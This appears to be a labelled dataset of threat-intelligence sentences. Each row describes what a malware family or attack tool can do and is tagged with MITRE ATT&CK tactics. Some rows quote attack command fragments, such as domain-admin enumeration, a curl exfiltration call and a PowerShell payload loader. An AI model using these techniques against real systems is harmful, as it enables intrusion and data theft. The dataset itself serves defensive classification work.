BlackCat has the ability to discover network shares on compromised networks.,['TA0007:Discovery']
BlackCat can broadcasts NetBIOS Name Service messages to search for servers connected to compromised networks.,['TA0007:Discovery']
BlackCat has the ability to stop VM services on compromised networks.,['TA0040:Impact']
"BlackCat can obtain the computer name and UUID, and enumerate local drives.",['TA0007:Discovery']
BlackCat can utilize `net use` commands to discover the user name on a compromised host.,['TA0007:Discovery']
BlackCat can execute commands on a compromised network with the use of `cmd.exe`.,['TA0002:Execution']
BlackCat can use Windows commands such as `fsutil behavior set SymLinkEvaluation R2L:1` to redirect file system access to a different location after gaining access into compromised networks.,['TA0005:Defense Evasion']
BlackCat can use `wmic.exe` to delete shadow copies on compromised networks.,['TA0002:Execution']
BlackEnergy attempts to bypass default User Access Control settings by exploiting a backward-compatibility setting found in Windows 7 and later.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
The BlackEnergy component KillDisk is capable of deleting Windows Event Logs.,['TA0005:Defense Evasion']
BlackEnergy has enabled the TESTSIGNING boot configuration option to facilitate loading of a driver component.,['TA0005:Defense Evasion']
"BlackEnergy has used a plug-in to gather credentials stored in files on the host by various software programs, including The Bat! email client, Outlook, and Windows Credential Store.",['TA0006:Credential Access']
"BlackEnergy has used a plug-in to gather credentials from web browsers including FireFox, Google Chrome, and Internet Explorer.",['TA0006:Credential Access']
"BlackEnergy 2 contains a ""Destroy"" plug-in that destroys data stored on victim hard drives by overwriting file contents.",['TA0040:Impact']
BlackEnergy injects its DLL component into svchost.exe.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
BlackEnergy has the capability to communicate over a backup channel via plus.google.com.,['TA0011:Command and Control']
"BlackEnergy gathers a list of installed apps from the uninstall program Registry. It also gathers registered mail, browser, and instant messaging clients from the Registry. BlackEnergy has searched for given file types.",['TA0007:Discovery']
BlackEnergy has removed the watermark associated with enabling the TESTSIGNING boot configuration option by removing the relevant strings in the user32.dll.mui of the system.,['TA0005:Defense Evasion']
BlackEnergy has run a keylogger plug-in on a victim.,"['TA0009:Collection', 'TA0006:Credential Access']"
BlackEnergy has conducted port scans on a host.,['TA0007:Discovery']
"BlackEnergy can gather very specific information about attached USB devices, to include device instance ID and drive geometry.",['TA0007:Discovery']
BlackEnergy has gathered a process list by using Tasklist.exe.,['TA0007:Discovery']
The BlackEnergy 3 variant drops its main DLL component and then creates a .lnk shortcut to that file in the startup folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
BlackEnergy has run a plug-in on a victim to spread through the local network by using PsExec and accessing admin shares.,['TA0008:Lateral Movement']
BlackEnergy is capable of taking screenshots.,['TA0009:Collection']
"One variant of BlackEnergy locates existing driver services that have been disabled and drops its driver component into one of those service's paths, replacing the legitimate executable. The malware then sets the hijacked service to start automatically to establish persistence.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
The BlackEnergy 3 variant drops its main DLL component and then creates a .lnk shortcut to that file in the startup folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"BlackEnergy has used Systeminfo to gather the OS version, as well as information on the system configuration, BIOS, the motherboard, and the processor.",['TA0007:Discovery']
BlackEnergy has gathered information about network IP configurations using ipconfig.exe and about routing tables using route.exe.,['TA0007:Discovery']
BlackEnergy has gathered information about local network connections using netstat.,['TA0007:Discovery']
BlackEnergy communicates with its C2 server over HTTP.,['TA0011:Command and Control']
A BlackEnergy 2 plug-in uses WMI to gather victim host details.,['TA0002:Execution']
One variant of BlackEnergy creates a new service using either a hard-coded or randomly generated name.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
BlackMould can copy files on a compromised host.,['TA0009:Collection']
BlackMould has the ability to find files on the targeted system.,['TA0007:Discovery']
BlackMould has the ability to download files to the victim's machine.,['TA0011:Command and Control']
BlackMould can enumerate local drives on a compromised host.,['TA0007:Discovery']
BlackMould can send commands to C2 in the body of HTTP POST requests.,['TA0011:Command and Control']
BlackMould can run cmd.exe with parameters.,['TA0002:Execution']
BloodHound can compress data collected by its SharpHound ingestor into a ZIP file to be written to disk.,['TA0009:Collection']
"BloodHound can collect information about domain users, including identification of domain admin accounts.",['TA0007:Discovery']
BloodHound can collect information about domain groups and members.,['TA0007:Discovery']
BloodHound has the ability to map domain trusts and identify misconfigurations for potential abuse.,['TA0007:Discovery']
BloodHound has the ability to collect local admin information via GPO.,['TA0007:Discovery']
BloodHound can identify users with local administrator rights.,['TA0007:Discovery']
BloodHound can collect information about local groups and members.,['TA0007:Discovery']
BloodHound can use .NET API calls in the SharpHound ingestor component to pull Active Directory data.,['TA0002:Execution']
BloodHound can collect password policy information on the target environment.,['TA0007:Discovery']
BloodHound can use PowerShell to pull Active Directory information from the target environment.,['TA0002:Execution']
"BloodHound can enumerate and collect the properties of domain computers, including domain controllers.",['TA0007:Discovery']
BloodHound can collect information on user sessions.,['TA0007:Discovery']
Bonadan can create bind and reverse shells on the infected system.,['TA0002:Execution']
Bonadan has maliciously altered the OpenSSH binary on targeted systems to create a backdoor.,['TA0003:Persistence']
Bonadan can download an additional module which has a cryptocurrency mining extension.,['TA0040:Impact']
Bonadan can download additional modules from the C2 server.,['TA0011:Command and Control']
Bonadan can use the ps command to discover other cryptocurrency miners active on the system.,['TA0007:Discovery']
Bonadan can XOR-encrypt C2 communications.,['TA0011:Command and Control']
"Bonadan has discovered the OS version, CPU model, and RAM size of the system it has been installed on.",['TA0007:Discovery']
Bonadan can find the external IP address of the infected host.,['TA0007:Discovery']
Bonadan has discovered the username of the user running the backdoor.,['TA0007:Discovery']
BoomBox can decrypt AES-encrypted files downloaded from C2.,['TA0005:Defense Evasion']
"BoomBox has the ability to execute an LDAP query to enumerate the distinguished name, SAM account name, and display name for all domain users.",['TA0007:Discovery']
BoomBox can execute an LDAP query to discover e-mail accounts for domain users.,['TA0007:Discovery']
BoomBox can check its current working directory and for the presence of a specific file and terminate if specific values are not found.,['TA0005:Defense Evasion']
BoomBox can upload data to dedicated per-victim folders in Dropbox.,['TA0010:Exfiltration']
BoomBox can search for specific files and directories on a machine.,['TA0007:Discovery']
BoomBox has the ability to download next stage malware components to a compromised system.,['TA0011:Command and Control']
BoomBox has gained execution through user interaction with a malicious file.,['TA0002:Execution']
BoomBox has the ability to mask malicious data strings as PDF files.,['TA0005:Defense Evasion']
BoomBox can encrypt data using AES prior to exfiltration.,['TA0005:Defense Evasion']
BoomBox can establish persistence by writing the Registry value MicroNativeCacheSvc to HKCU\Software\Microsoft\Windows\CurrentVersion\Run.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
BoomBox can use RunDLL32 for execution.,['TA0005:Defense Evasion']
"BoomBox can enumerate the hostname, domain, and IP of a compromised host.",['TA0007:Discovery']
BoomBox can enumerate the username on a compromised host.,['TA0007:Discovery']
BoomBox has used HTTP POST requests for C2.,['TA0011:Command and Control']
BoomBox can download files from Dropbox using a hardcoded access token.,['TA0011:Command and Control']
BoxCaon has used DropBox for C2 communications.,['TA0011:Command and Control']
BoxCaon established persistence by setting the HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load registry key to point to its executable.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
BoxCaon can upload files from a compromised host.,['TA0009:Collection']
BoxCaon uploads files and data from a compromised host over the existing C2 channel.,['TA0010:Exfiltration']
BoxCaon has the capability to download folders' contents on the system and upload the results back to its Dropbox drive.,['TA0010:Exfiltration']
"BoxCaon has searched for files on the system, such as documents located in the desktop folder.",['TA0007:Discovery']
BoxCaon can download files.,['TA0011:Command and Control']
BoxCaon has created a working folder for collected files that it sends to the C2 server.,['TA0009:Collection']
BoxCaon has used Windows API calls to obtain information about the compromised host.,['TA0002:Execution']
"BoxCaon used the ""StackStrings"" obfuscation technique to hide malicious functionalities.",['TA0005:Defense Evasion']
BoxCaon can collect the victim's MAC address by using the GetAdaptersInfo API.,['TA0007:Discovery']
"BoxCaon can execute arbitrary commands and utilize the ""ComSpec"" environment variable.",['TA0002:Execution']
Brave Prince terminates antimalware processes.,['TA0005:Defense Evasion']
"Some Brave Prince variants have used South Korea's Daum email service to exfiltrate information, and later variants have posted the data to a web server via an HTTP post command.",['TA0010:Exfiltration']
Brave Prince gathers file and directory information from the victim’s machine.,['TA0007:Discovery']
Brave Prince lists the running processes.,['TA0007:Discovery']
Brave Prince gathers information about the Registry.,['TA0007:Discovery']
Brave Prince collects hard drive content and system configuration information.,['TA0007:Discovery']
Brave Prince gathers network configuration information as well as the ARP cache.,['TA0007:Discovery']
Briba downloads files onto infected hosts.,['TA0011:Command and Control']
Briba creates run key Registry entries pointing to malicious DLLs dropped to disk.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Briba uses rundll32 within Registry Run Keys / Startup Folder entries to execute malicious DLLs.,['TA0005:Defense Evasion']
Briba installs a service pointing to a malicious DLL dropped to disk.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Brute Ratel C4 has used search order hijacking to load a malicious payload DLL as a dependency to a benign application packaged in the same ISO.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Brute Ratel C4 has loaded a malicious DLL by spoofing the name of the legitimate Version.DLL and placing it in the same folder as the digitally-signed Microsoft binary OneDriveUpdater.exe.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Brute Ratel C4 can use DNS over HTTPS for C2.,['TA0011:Command and Control']
Brute Ratel C4 has the ability to upload files from a compromised system.,['TA0009:Collection']
Brute Ratel C4 has the ability to deobfuscate its payload prior to execution.,['TA0005:Defense Evasion']
"Brute Ratel C4 can use LDAP queries, `net group ""Domain Admins"" /domain` and `net user /domain` for discovery.",['TA0007:Discovery']
Brute Ratel C4 can use `net group` for discovery on targeted domains.,['TA0007:Discovery']
Brute Ratel C4 can use LDAP queries and `nltest /domain_trusts` for domain trust discovery.,['TA0007:Discovery']
Brute Ratel C4 can call and dynamically resolve hashed APIs.,['TA0005:Defense Evasion']
Brute Ratel C4 has the ability to hide memory artifacts and to patch Event Tracing for Windows and the Anti Malware Scan Interface .,['TA0005:Defense Evasion']
Brute Ratel C4 can download files to compromised hosts.,['TA0011:Command and Control']
Brute Ratel C4 can decode Kerberos 5 tickets and convert it to hashcat format for subsequent cracking.,['TA0006:Credential Access']
Brute Ratel C4 has gained execution through users opening malicious documents.,['TA0002:Execution']
Brute Ratel C4 has used Microsoft Word icons to hide malicious LNK files.,['TA0005:Defense Evasion']
Brute Ratel C4 has used a payload file named OneDrive.update to appear benign.,['TA0005:Defense Evasion']
"Brute Ratel C4 can call multiple Windows APIs for execution, to share memory, and defense evasion.",['TA0002:Execution']
Brute Ratel C4 can conduct port scanning against targeted systems.,['TA0007:Discovery']
Brute Ratel C4 has the ability to use TCP for external C2.,['TA0011:Command and Control']
Brute Ratel C4 has used encrypted payload files and maintains an encrypted configuration structure in memory.,['TA0005:Defense Evasion']
Brute Ratel C4 has injected Latrodectus into the Explorer.exe process on comrpomised hosts.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Brute Ratel C4 can enumerate all processes and locate specific process IDs .,['TA0007:Discovery']
Brute Ratel C4 can use DNS over HTTPS for C2.,['TA0011:Command and Control']
Brute Ratel C4 has used reflective loading to execute malicious DLLs.,['TA0005:Defense Evasion']
Brute Ratel C4 has the ability to use RPC for lateral movement.,['TA0008:Lateral Movement']
Brute Ratel C4 has the ability to use SMB to pivot in compromised networks.,['TA0008:Lateral Movement']
Brute Ratel C4 can take screenshots on compromised hosts.,['TA0009:Collection']
Brute Ratel C4 can detect EDR userland hooks.,['TA0007:Discovery']
Brute Ratel C4 can create Windows system services for execution.,['TA0002:Execution']
Brute Ratel C4 can call `NtDelayExecution` to pause execution.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Brute Ratel C4 can use HTTPS and HTTPS for C2 communication.,['TA0011:Command and Control']
"Brute Ratel C4 can use legitimate websites for external C2 channels including Slack, Discord, and MS Teams.",['TA0011:Command and Control']
Brute Ratel C4 can use cmd.exe for execution.,['TA0002:Execution']
Brute Ratel C4 can use WMI to move laterally.,['TA0002:Execution']
Brute Ratel C4 can use WinRM for pivoting.,['TA0008:Lateral Movement']
Bumblebee can compress data stolen from the Registry and volume shadow copies prior to exfiltration.,['TA0009:Collection']
Bumblebee can use asynchronous procedure call injection to execute commands received from C2.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Bumblebee has the ability to bypass UAC to deploy post exploitation tools with elevated privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Bumblebee can use a COM object to execute queries to gather system information.,['TA0002:Execution']
Bumblebee can capture and compress stolen credentials from the Registry and volume shadow copies.,['TA0009:Collection']
Bumblebee can search for tools used in static analysis.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Bumblebee can deobfuscate C2 server responses and unpack its code on targeted hosts.,['TA0005:Defense Evasion']
The Bumblebee loader can support the `Dij` command which gives it the ability to inject DLLs into the memory of other processes.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Bumblebee can send collected data in JSON format to C2.,['TA0010:Exfiltration']
Bumblebee can use backup C2 servers if the primary server fails.,['TA0011:Command and Control']
Bumblebee can uninstall its loader through the use of a `Sdl` command.,['TA0005:Defense Evasion']
Bumblebee can download and execute additional payloads including through the use of a `Dex` command.,['TA0011:Command and Control']
Bumblebee has relied upon a user opening an ISO file to enable execution of malicious shortcut files and DLLs.,['TA0002:Execution']
Bumblebee has relied upon a user downloading a file from a OneDrive link for execution.,['TA0002:Execution']
"Bumblebee has named component DLLs ""RapportGP.dll"" to match those used by the security company Trusteer.",['TA0005:Defense Evasion']
Bumblebee can use multiple Native APIs.,['TA0002:Execution']
Bumblebee has been delivered as password-protected zipped ISO files and used control-flow-flattening to obfuscate the flow of functions.,['TA0005:Defense Evasion']
Bumblebee can use `odbcconf.exe` to run DLLs on targeted hosts.,['TA0005:Defense Evasion']
Bumblebee can use PowerShell for execution.,['TA0002:Execution']
Bumblebee can identify processes associated with analytical tools.,['TA0007:Discovery']
Bumblebee can inject code into multiple processes on infected endpoints.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Bumblebee can check the Registry for specific keys.,['TA0007:Discovery']
Bumblebee has used `rundll32` for execution of the loader component.,['TA0005:Defense Evasion']
Bumblebee can achieve persistence by copying its DLL to a subdirectory of %APPDATA% and creating a Visual Basic Script that will load the DLL via a scheduled task.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Bumblebee can identify specific analytical tools based on running processes.,['TA0007:Discovery']
Bumblebee can use `LoadLibrary` to attempt to execute GdiPlus.dll.,['TA0002:Execution']
Bumblebee has gained execution through luring users into opening malicious attachments.,['TA0001:Initial Access']
Bumblebee has been spread through e-mail campaigns with malicious links.,['TA0001:Initial Access']
Bumblebee has the ability to base64 encode C2 server responses.,['TA0011:Command and Control']
Bumblebee can encrypt C2 requests and responses with RC4,['TA0011:Command and Control']
Bumblebee has the ability to search for designated file paths and Registry keys that indicate a virtualized environment from multiple products.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Bumblebee can enumerate the OS version and domain on a targeted system.,['TA0007:Discovery']
Bumblebee has the ability to identify the user name.,['TA0007:Discovery']
Bumblebee has the ability to set a hardcoded and randomized sleep interval.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Bumblebee has the ability to perform anti-virtualization checks.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Bumblebee can create a Visual Basic script to enable persistence.,['TA0002:Execution']
Bumblebee has been downloaded to victim's machines from OneDrive.,['TA0011:Command and Control']
Bumblebee can use `cmd.exe` to drop and run files.,['TA0002:Execution']
Bumblebee can use WMI to gather system information and to spawn processes for code injection.,['TA0002:Execution']
Bundlore can use AppleScript to inject malicious JavaScript into a browser.,['TA0002:Execution']
Bundlore can install malicious browser extensions that are used to hijack user searches.,['TA0003:Persistence']
Bundlore has used openssl to decrypt AES encrypted payload data. Bundlore has also used base64 and RC4 with a hardcoded key to deobfuscate data.,['TA0005:Defense Evasion']
Bundlore can change browser security settings to enable extensions to be installed. Bundlore uses the pkill cfprefsd command to prevent users from inspecting processes.,['TA0005:Defense Evasion']
Bundlore has been spread through malicious advertisements on websites.,['TA0001:Initial Access']
Bundlore uses the curl -s -L -o command to exfiltrate archived data to a URL.,['TA0010:Exfiltration']
Bundlore prompts the user for their credentials.,"['TA0009:Collection', 'TA0006:Credential Access']"
"Bundlore uses the mktemp utility to make unique file and directory names for payloads, such as TMP_DIR=`mktemp -d -t x.",['TA0005:Defense Evasion']
Bundlore can download and execute new versions of itself.,['TA0011:Command and Control']
Bundlore can execute JavaScript by injecting it into the victim's browser.,['TA0002:Execution']
Bundlore can persist via a LaunchAgent.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Bundlore can persist via a LaunchDaemon.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Bundlore changes the permissions of a payload using the command chmod -R 755.,['TA0005:Defense Evasion']
Bundlore has attempted to get users to execute a malicious .app file that looks like a Flash Player update.,['TA0002:Execution']
Bundlore has disguised a malicious .app file as a Flash Player update.,['TA0005:Defense Evasion']
"Bundlore has obfuscated data with base64, AES, RC4, and bz2.",['TA0005:Defense Evasion']
Bundlore has used the ps command to list processes.,['TA0007:Discovery']
Bundlore has used Python scripts to execute payloads.,['TA0002:Execution']
Bundlore creates a new key pair with ssh-keygen and drops the newly created user key in authorized_keys to enable remote login.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Bundlore has the ability to enumerate what browser is being used as well as version information for Safari.,['TA0007:Discovery']
Bundlore will enumerate the macOS version to determine which follow-on behaviors to execute using /usr/bin/sw_vers -productVersion.,['TA0007:Discovery']
Bundlore has leveraged /bin/sh and /bin/bash to execute commands on the victim machine.,['TA0002:Execution']
Bundlore uses HTTP requests for C2.,['TA0011:Command and Control']
The CALENDAR malware communicates through the use of events in Google Calendar.,['TA0011:Command and Control']
CALENDAR has a command to run cmd.exe to execute commands.,['TA0002:Execution']
CARROTBALL has the ability to use FTP in C2 communications.,['TA0011:Command and Control']
CARROTBALL has the ability to download and install a remote payload.,['TA0011:Command and Control']
CARROTBALL has been executed through users being lured into opening malicious e-mail attachments.,['TA0002:Execution']
CARROTBALL has used a custom base64 alphabet to decode files.,['TA0005:Defense Evasion']
CARROTBAT has the ability to execute obfuscated commands on the infected host.,['TA0005:Defense Evasion']
CARROTBAT has the ability to download a base64 encoded payload.,['TA0005:Defense Evasion']
CARROTBAT has the ability to delete downloaded files from a compromised host.,['TA0005:Defense Evasion']
CARROTBAT has the ability to download and execute a remote file via certutil.,['TA0011:Command and Control']
CARROTBAT has the ability to determine the operating system of the compromised host and whether Windows is being run with x86 or x64 architecture.,['TA0007:Discovery']
CARROTBAT has the ability to execute command line arguments on a compromised host.,['TA0002:Execution']
"CCBkdr was added to a legitimate, signed version 5.33 of the CCleaner software and distributed on CCleaner's distribution site.",['TA0001:Initial Access']
CCBkdr can use a DGA for Fallback Channels if communications with the primary command and control server are lost.,['TA0011:Command and Control']
The CHIMNEYSWEEP installer has been padded with null bytes to inflate its size.,['TA0005:Defense Evasion']
CHIMNEYSWEEP can make use of the Windows `SilentCleanup` scheduled task to execute its payload with elevated privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
CHIMNEYSWEEP can use CMSTP.exe to install a malicious Microsoft Connection Manager Profile.,['TA0005:Defense Evasion']
CHIMNEYSWEEP can capture content from the clipboard.,['TA0009:Collection']
CHIMNEYSWEEP has been dropped by a self-extracting archive signed with a valid digital certificate.,['TA0005:Defense Evasion']
CHIMNEYSWEEP can collect files from compromised hosts.,['TA0009:Collection']
CHIMNEYSWEEP can use an embedded RC4 key to decrypt Windows API function strings.,['TA0005:Defense Evasion']
CHIMNEYSWEEP can use `LoadLibrary` and `GetProcAddress` to resolve Windows API function strings at run time.,['TA0005:Defense Evasion']
CHIMNEYSWEEP can extract RC4 encrypted embedded payloads for privilege escalation.,['TA0005:Defense Evasion']
CHIMNEYSWEEP can execute a task which leads to execution if it finds a process name containing “creensaver.”,['TA0005:Defense Evasion']
CHIMNEYSWEEP can upload collected files to the command-and-control server.,['TA0010:Exfiltration']
CHIMNEYSWEEP has the ability to enumerate directories for files that match a set list.,['TA0007:Discovery']
CHIMNEYSWEEP can download additional files from C2.,['TA0011:Command and Control']
CHIMNEYSWEEP has the ability to support keylogging.,"['TA0009:Collection', 'TA0006:Credential Access']"
CHIMNEYSWEEP can store captured screenshots to disk including to a covert store named `APPX.%x%x%x%x%x.tmp` where `%x` is a random value.,['TA0009:Collection']
CHIMNEYSWEEP can use the Windows Registry Environment key to change the `%windir%` variable to point to `c:\Windows` to enable payload execution.,['TA0005:Defense Evasion']
CHIMNEYSWEEP can use Windows APIs including `LoadLibrary` and `GetProcAddress`.,['TA0002:Execution']
CHIMNEYSWEEP can use a custom Base64 alphabet for encoding C2.,['TA0011:Command and Control']
CHIMNEYSWEEP can use a custom Base64 alphabet to encode an API decryption key.,['TA0005:Defense Evasion']
CHIMNEYSWEEP can monitor for removable drives.,['TA0007:Discovery']
"CHIMNEYSWEEP can invoke the PowerShell command `Reflection.Assembly::LoadFile\n$i=\""\""\n$r=%s::%s\necho $r,$i\n` to execute secondary payloads.",['TA0002:Execution']
CHIMNEYSWEEP can check if a process name contains “creensaver.”,['TA0007:Discovery']
CHIMNEYSWEEP can use the Windows `SilentCleanup` scheduled task to enable payload execution.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
CHIMNEYSWEEP can capture screenshots on targeted systems using a timer and either upload them or store them to disk.,['TA0009:Collection']
CHIMNEYSWEEP is capable of checking whether a compromised device is running DeepFreeze by Faronics.,['TA0007:Discovery']
CHIMNEYSWEEP has included the victim's computer name and username in C2 messages sent to actor-owned infrastructure.,['TA0007:Discovery']
CHIMNEYSWEEP can reboot or shutdown the targeted system or logoff the current user.,['TA0040:Impact']
"CHIMNEYSWEEP can time stomp its executable, previously dating it between 2010 to 2021.",['TA0005:Defense Evasion']
CHIMNEYSWEEP has executed a script named cln.vbs on compromised hosts.,['TA0002:Execution']
CHIMNEYSWEEP can send `HTTP GET` requests to C2.,['TA0011:Command and Control']
"CHIMNEYSWEEP has the ability to use use Telegram channels to return a list of commands to be executed, to download additional payloads, or to create a reverse shell.",['TA0011:Command and Control']
CHOPSTICK encrypts C2 communications with TLS.,['TA0011:Command and Control']
CHOPSTICK is capable of performing remote command execution.,['TA0002:Execution']
"Part of APT28's operation involved using CHOPSTICK modules to copy itself to air-gapped machines, using files written to USB sticks to transfer data and command traffic.",['TA0011:Command and Control']
"CHOPSTICK can use a DGA for Fallback Channels, domains are generated by concatenating words from lists.",['TA0011:Command and Control']
CHOPSTICK can switch to a new C2 channel if the current one is broken.,['TA0011:Command and Control']
"An older version of CHOPSTICK has a module that monitors all mounted volumes for files with the extensions .doc, .docx, .pgp, .gpg, .m2f, or .m2o.",['TA0007:Discovery']
CHOPSTICK may store RC4 encrypted configuration information in the Windows Registry.,['TA0005:Defense Evasion']
CHOPSTICK is capable of performing remote file transmission.,['TA0011:Command and Control']
CHOPSTICK used a proxy server between victims and the C2 server.,['TA0011:Command and Control']
CHOPSTICK is capable of performing keylogging.,"['TA0009:Collection', 'TA0006:Credential Access']"
Various implementations of CHOPSTICK communicate with C2 over SMTP and POP3.,['TA0011:Command and Control']
CHOPSTICK may modify Registry keys to store RC4 encrypted configuration information.,['TA0005:Defense Evasion']
"CHOPSTICK provides access to the Windows Registry, which can be used to gather information.",['TA0007:Discovery']
Part of APT28's operation involved using CHOPSTICK modules to copy itself to air-gapped machines and using files written to USB sticks to transfer data and command traffic.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
CHOPSTICK has the capability to capture screenshots.,['TA0009:Collection']
CHOPSTICK checks for antivirus and forensics software.,['TA0007:Discovery']
CHOPSTICK encrypts C2 communications with RC4.,['TA0011:Command and Control']
CHOPSTICK includes runtime checks to identify an analysis environment and prevent execution on it.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Various implementations of CHOPSTICK communicate with C2 over HTTP.,['TA0011:Command and Control']
COATHANGER connects to command and control infrastructure using SSL.,['TA0011:Command and Control']
COATHANGER decodes configuration items from a bundled file for command and control activity.,['TA0005:Defense Evasion']
"COATHANGER copies the malicious file /data2/.bd.key/preload.so to /lib/preload.so, then launches a child process that executes the malicious file /data2/.bd.key/authd as /bin/authd with the arguments /lib/preload.so reboot newreboot 1. This injects the malicious preload.so file into the process with PID 1, and replaces its reboot function with the malicious newreboot function for persistence.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
COATHANGER is installed following exploitation of a vulnerable FortiGate device.,['TA0001:Initial Access']
COATHANGER removes files from victim environments following use in multiple instances.,['TA0005:Defense Evasion']
COATHANGER will survey the contents of system files during installation.,['TA0007:Discovery']
COATHANGER creates and installs itself to a hidden installation directory.,['TA0005:Defense Evasion']
COATHANGER will remove and write malicious shared objects associated with legitimate system functions such as `read`.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
COATHANGER will create a daemon for timed check-ins with command and control infrastructure.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
COATHANGER will set the GID of `httpsd` to 90 when infected.,['TA0005:Defense Evasion']
COATHANGER uses ICMP for transmitting configuration information to and from its command and control server.,['TA0011:Command and Control']
COATHANGER can store obfuscated configuration information in the last 56 bytes of the file `/date/.bd.key/preload.so`.,['TA0005:Defense Evasion']
COATHANGER will query running process information to determine subsequent program execution flow.,['TA0007:Discovery']
COATHANGER includes a binary labeled `authd` that can inject a library into a running process and then hook an existing function within that process with a new function from that library.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
COATHANGER hooks or replaces multiple legitimate processes and other functions on victim devices.,['TA0005:Defense Evasion']
The first stage of COATHANGER is delivered as a packed file.,['TA0005:Defense Evasion']
COATHANGER provides a BusyBox reverse shell for command and control.,['TA0002:Execution']
COATHANGER uses an HTTP GET request to initialize a follow-on TLS tunnel for command and control.,['TA0011:Command and Control']
"CORALDECK has created password-protected RAR, WinImage, and zip archives to be exfiltrated.",['TA0009:Collection']
CORALDECK has exfiltrated data in HTTP POST headers.,['TA0010:Exfiltration']
CORALDECK searches for specified files.,['TA0007:Discovery']
CORESHELL contains unused machine instructions in a likely attempt to hinder analysis.,['TA0005:Defense Evasion']
CORESHELL downloads another dropper from its C2 server.,['TA0011:Command and Control']
CORESHELL can communicate over SMTP and POP3 for C2.,['TA0011:Command and Control']
CORESHELL obfuscates strings using a custom stream cipher.,['TA0005:Defense Evasion']
"CORESHELL has established persistence by creating autostart extensibility point Registry entries in the Run key and other Registry keys, as well as by creating shortcuts in the Internet Explorer Quick Start folder.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"CORESHELL is installed via execution of rundll32 with an export named ""init"" or ""InitW.""",['TA0005:Defense Evasion']
CORESHELL C2 messages are Base64-encoded.,['TA0011:Command and Control']
CORESHELL C2 messages are encrypted with custom stream ciphers using six-byte or eight-byte keys.,['TA0011:Command and Control']
"CORESHELL collects hostname, volume serial number and OS version data from the victim and sends the information to its C2 server.",['TA0007:Discovery']
CORESHELL can communicate over HTTP for C2.,['TA0011:Command and Control']
CSPY Downloader can bypass UAC using the SilentCleanup task to execute the binary with elevated privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
CSPY Downloader has come signed with revoked certificates.,['TA0005:Defense Evasion']
CSPY Downloader has the ability to self delete.,['TA0005:Defense Evasion']
CSPY Downloader has the ability to remove values it writes to the Registry.,['TA0005:Defense Evasion']
CSPY Downloader can download additional tools to a compromised host.,['TA0011:Command and Control']
CSPY Downloader has been delivered via malicious documents with embedded macros.,['TA0002:Execution']
CSPY Downloader has attempted to appear as a legitimate Windows service with a fake description claiming it is used to support packed applications.,['TA0005:Defense Evasion']
CSPY Downloader can write to the Registry under the %windir% variable to execute tasks.,['TA0005:Defense Evasion']
CSPY Downloader can use the schtasks utility to bypass UAC.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
CSPY Downloader has been packed with UPX.,['TA0005:Defense Evasion']
"CSPY Downloader can search loaded modules, PEB structure, file paths, Registry keys, and memory to determine if it is being debugged or running in a virtual environment.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
CSPY Downloader can use GET requests to download additional payloads from C2.,['TA0011:Command and Control']
Cachedump can extract cached password hashes from cache entry information.,['TA0006:Credential Access']
CaddyWiper can work alphabetically through drives on a compromised system to take ownership of and overwrite all files.,['TA0040:Impact']
"CaddyWiper has the ability to destroy information about a physical drive's partitions including the MBR, GPT, and partition entries.",['TA0040:Impact']
CaddyWiper can enumerate all files and directories on a compromised host.,['TA0007:Discovery']
"CaddyWiper has the ability to dynamically resolve and use APIs, including `SeTakeOwnershipPrivilege`.",['TA0002:Execution']
CaddyWiper can obtain a list of current processes.,['TA0007:Discovery']
CaddyWiper can use `DsRoleGetPrimaryDomainInformation` to determine the role of the infected machine. CaddyWiper can also halt execution if the compromised host is identified as a domain controller.,['TA0007:Discovery']
CaddyWiper can modify ACL entries to take ownership of files.,['TA0005:Defense Evasion']
Cadelspy has the ability to identify open windows on the compromised host.,['TA0007:Discovery']
Cadelspy has the ability to compress stolen data into a .cab file.,['TA0009:Collection']
Cadelspy has the ability to record audio from the compromised host.,['TA0009:Collection']
Cadelspy has the ability to steal data from the clipboard.,['TA0009:Collection']
Cadelspy has the ability to log keystrokes on the compromised host.,"['TA0009:Collection', 'TA0006:Credential Access']"
Cadelspy has the ability to steal information about printers and the documents sent to printers.,['TA0007:Discovery']
